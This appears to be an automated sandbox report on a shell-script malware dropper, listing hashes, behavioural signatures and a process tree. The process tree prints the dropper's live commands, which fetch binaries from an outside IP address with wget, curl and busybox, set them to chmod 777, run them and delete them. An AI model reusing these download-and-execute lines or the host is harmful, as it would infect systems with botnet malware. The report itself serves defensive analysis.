Analysis
-
max time kernel
56s -
max time network
58s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-11-2024 02:28
Static task
static1
Behavioral task
behavioral1
Sample
1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
-
Size
10KB
-
MD5
95086b1594ecb8d1d6f260c45e28a21c
-
SHA1
21511d843b85530f6b864ac7f71c20f01f1166b8
-
SHA256
1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e
-
SHA512
757577fa6a5246c8ffe2cd896cf521257e0d3ccb384b4ebfc254716190bf903f7e3fc20c81237da47e0a2d020a9089e1a892c67f4876f89e6b78e09be3a72233
-
SSDEEP
96:N+2fK+qBBAtH4hHiRNonwem5y44fvopFA3/tSFppKEh0yiRNonwefO4fvopFbQ3l:r4hHe15y4g00y0J4l
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 795 chmod 750 chmod 886 chmod 895 chmod 937 chmod 955 chmod 864 chmod 913 chmod 949 chmod 943 chmod 768 chmod 820 chmod 838 chmod 880 chmod 901 chmod 757 chmod 907 chmod 985 chmod 991 chmod 826 chmod 874 chmod 973 chmod 979 chmod 961 chmod 967 chmod 919 chmod 931 chmod 925 chmod -
Executes dropped EXE 28 IoCs
Processes:
sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rlV6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnurLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt9KtuwmIyCu2831WrZTg35YWBSba74CicDwJHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsxmDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5kg7i06MjgHyfbI0rokBoJywO6zaylfwMrfhgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4xGoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEYRoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5kg7i06MjgHyfbI0rokBoJywO6zaylfwMrfhgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4xJHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsxmDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6NGoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEYRoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakfV6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnurLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMqsL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt9KtuwmIyCu2831WrZTg35YWBSba74CicDwioc pid process /tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl 751 sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl /tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu 758 V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu /tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48 769 rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48 /tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq 796 kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq /tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt 821 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt /tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw 827 9KtuwmIyCu2831WrZTg35YWBSba74CicDw /tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx 840 JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx /tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N 865 mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N /tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5 875 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5 /tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf 881 kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf /tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x 887 hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x /tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY 896 GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY /tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2 902 RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2 /tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf 908 gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf /tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5 914 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5 /tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf 920 kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf /tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x 926 hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x /tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx 932 JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx /tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N 938 mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N /tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY 944 GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY /tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2 950 RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2 /tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf 956 gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf /tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu 962 V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu /tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48 968 rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48 /tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq 974 kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq /tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl 980 sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl /tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt 986 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt /tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw 992 9KtuwmIyCu2831WrZTg35YWBSba74CicDw -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N curl File opened for modification /tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw curl File opened for modification /tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw curl File opened for modification /tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf curl File opened for modification /tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx curl File opened for modification /tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu curl File opened for modification /tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2 curl File opened for modification /tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf curl File opened for modification /tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq curl File opened for modification /tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY curl File opened for modification /tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf curl File opened for modification /tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2 curl File opened for modification /tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu curl File opened for modification /tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x curl File opened for modification /tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf curl File opened for modification /tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48 curl File opened for modification /tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx curl File opened for modification /tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N curl File opened for modification /tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt curl File opened for modification /tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5 curl File opened for modification /tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5 curl File opened for modification /tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl curl File opened for modification /tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48 curl File opened for modification /tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl curl File opened for modification /tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt curl File opened for modification /tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY curl File opened for modification /tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x curl File opened for modification /tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq curl
Processes
-
/tmp/1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh/tmp/1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh1⤵PID:720
-
/bin/rm/bin/rm bins.sh2⤵PID:723
-
/usr/bin/wgetwget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵PID:725
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵PID:748
-
/bin/chmodchmod 777 sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- File and Directory Permissions Modification
PID:750 -
/tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl./sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- Executes dropped EXE
PID:751 -
/bin/rmrm sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵PID:753
-
/usr/bin/wgetwget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵PID:754
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵PID:756
-
/bin/chmodchmod 777 V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- File and Directory Permissions Modification
PID:757 -
/tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu./V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- Executes dropped EXE
PID:758 -
/bin/rmrm V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵PID:759
-
/usr/bin/wgetwget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵PID:760
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵PID:764
-
/bin/chmodchmod 777 rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- File and Directory Permissions Modification
PID:768 -
/tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48./rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- Executes dropped EXE
PID:769 -
/bin/rmrm rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵PID:772
-
/usr/bin/wgetwget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵PID:774
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵PID:790
-
/bin/chmodchmod 777 kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- File and Directory Permissions Modification
PID:795 -
/tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq./kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- Executes dropped EXE
PID:796 -
/bin/rmrm kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵PID:799
-
/usr/bin/wgetwget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵PID:800
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵PID:818
-
/bin/chmodchmod 777 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- File and Directory Permissions Modification
PID:820 -
/tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt./47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- Executes dropped EXE
PID:821 -
/bin/rmrm 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵PID:822
-
/usr/bin/wgetwget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵PID:823
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵PID:825
-
/bin/chmodchmod 777 9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- File and Directory Permissions Modification
PID:826 -
/tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw./9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- Executes dropped EXE
PID:827 -
/bin/rmrm 9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵PID:828
-
/usr/bin/wgetwget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵PID:829
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵PID:833
-
/bin/chmodchmod 777 JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- File and Directory Permissions Modification
PID:838 -
/tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx./JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- Executes dropped EXE
PID:840 -
/bin/rmrm JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵PID:843
-
/usr/bin/wgetwget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵PID:844
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵PID:859
-
/bin/chmodchmod 777 mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N./mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- Executes dropped EXE
PID:865 -
/bin/rmrm mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵PID:868
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵PID:870
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵PID:873
-
/bin/chmodchmod 777 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- File and Directory Permissions Modification
PID:874 -
/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5./5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- Executes dropped EXE
PID:875 -
/bin/rmrm 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵PID:876
-
/usr/bin/wgetwget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵PID:877
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵PID:879
-
/bin/chmodchmod 777 kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- File and Directory Permissions Modification
PID:880 -
/tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf./kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- Executes dropped EXE
PID:881 -
/bin/rmrm kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵PID:882
-
/usr/bin/wgetwget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵PID:883
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵PID:885
-
/bin/chmodchmod 777 hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- File and Directory Permissions Modification
PID:886 -
/tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x./hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- Executes dropped EXE
PID:887 -
/bin/rmrm hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵PID:888
-
/usr/bin/wgetwget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵PID:889
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵PID:894
-
/bin/chmodchmod 777 GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- File and Directory Permissions Modification
PID:895 -
/tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY./GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- Executes dropped EXE
PID:896 -
/bin/rmrm GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵PID:897
-
/usr/bin/wgetwget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵PID:898
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵PID:900
-
/bin/chmodchmod 777 RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- File and Directory Permissions Modification
PID:901 -
/tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2./RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- Executes dropped EXE
PID:902 -
/bin/rmrm RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵PID:903
-
/usr/bin/wgetwget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵PID:904
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵PID:906
-
/bin/chmodchmod 777 gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- File and Directory Permissions Modification
PID:907 -
/tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf./gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- Executes dropped EXE
PID:908 -
/bin/rmrm gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵PID:909
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵PID:910
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵PID:912
-
/bin/chmodchmod 777 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- File and Directory Permissions Modification
PID:913 -
/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5./5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- Executes dropped EXE
PID:914 -
/bin/rmrm 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵PID:915
-
/usr/bin/wgetwget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵PID:916
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵PID:918
-
/bin/chmodchmod 777 kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- File and Directory Permissions Modification
PID:919 -
/tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf./kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- Executes dropped EXE
PID:920 -
/bin/rmrm kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵PID:921
-
/usr/bin/wgetwget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵PID:922
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵PID:924
-
/bin/chmodchmod 777 hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- File and Directory Permissions Modification
PID:925 -
/tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x./hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- Executes dropped EXE
PID:926 -
/bin/rmrm hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵PID:927
-
/usr/bin/wgetwget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵PID:928
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵PID:930
-
/bin/chmodchmod 777 JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- File and Directory Permissions Modification
PID:931 -
/tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx./JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- Executes dropped EXE
PID:932 -
/bin/rmrm JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵PID:933
-
/usr/bin/wgetwget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵PID:934
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵PID:936
-
/bin/chmodchmod 777 mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- File and Directory Permissions Modification
PID:937 -
/tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N./mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- Executes dropped EXE
PID:938 -
/bin/rmrm mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵PID:939
-
